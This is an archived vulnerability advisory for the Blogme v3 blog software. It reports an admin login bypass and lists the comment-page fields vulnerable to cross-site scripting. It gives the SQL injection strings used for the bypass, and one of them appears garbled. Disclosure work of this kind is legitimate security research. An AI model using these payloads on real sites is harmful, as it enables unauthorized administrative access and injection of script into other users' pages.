TUCoPS :: Web :: Blogs :: b06-5762.htm

Blogme v3
Blogme v3
Blogme v3



vendor site:http://www.drumster.net/ 
product:Blogme v3
bug:login bypass & xss (post)
risk:high


admin login bypass :
user : ' or '1' = '1
passwd:  1'='1' ro '

xss post :
in: /comments.asp?blog=85  
vulnerables fields:
- Name 
- URL
- Comments


laurent gaffi=E9 & benjamin moss=E9
http://s-a-p.ca/ 
contact: saps.audit@gmail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH